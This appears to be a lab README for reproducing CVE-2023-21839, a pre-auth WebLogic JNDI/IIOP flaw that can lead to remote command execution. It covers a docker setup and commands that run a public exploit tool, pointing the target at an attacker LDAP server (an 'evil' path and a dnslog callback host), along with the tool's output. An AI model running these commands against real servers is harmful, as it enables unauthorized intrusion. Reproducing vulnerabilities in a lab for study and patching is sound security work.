# Weblogic Pre-Auth Remote Command Execution (CVE-2023-21839)

[中文版本(Chinese version)](README.zh-cn.md)

Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership.

In [Oracle Critical Patch Update Advisory - January 2023](https://www.oracle.com/security-alerts/cpujan2023.html), Oracle fixed this security vulnerability.

CVE-2023-21839 allow remote users to make a JNDI lookup operation through IIOP without authorization, which may cause RCE vulnerability when JDK version is too low or there is a gadget (use javaSerializedData) locally.

References:

- https://www.oracle.com/security-alerts/cpujan2023.html

## Environment Setup

Start a Weblogic server 12.2.1.3 by executing the following command:

```
docker compose up -d
```

After the startup is complete, visit `http://your-ip:7001/console` to view the administrator console login page.

## Exploit

https://github.com/4ra1n/CVE-2023-21839

```shell
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
```

Windows

```shell
cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
```

DNS Log

```shell
CVE-2023-21839.exe -ip 192.168.25.129 -port 7001 -ldap ldap://kmi896.dnslog.cn/test
[*] your-ip: 192.168.25.129
[*] your-port: 7001
[*] your-ldap: ldap://kmi896.dnslog.cn/test
[*] weblogic 12
[*] id=2 LocateRequest
[*] id=3 RebindRequest
[*] id=4 RebindRequest
[*] id=5 LocateRequest
[*] id=6 ResolveRequest
[*] id=7 ResolveRequest
```

![](1.png)
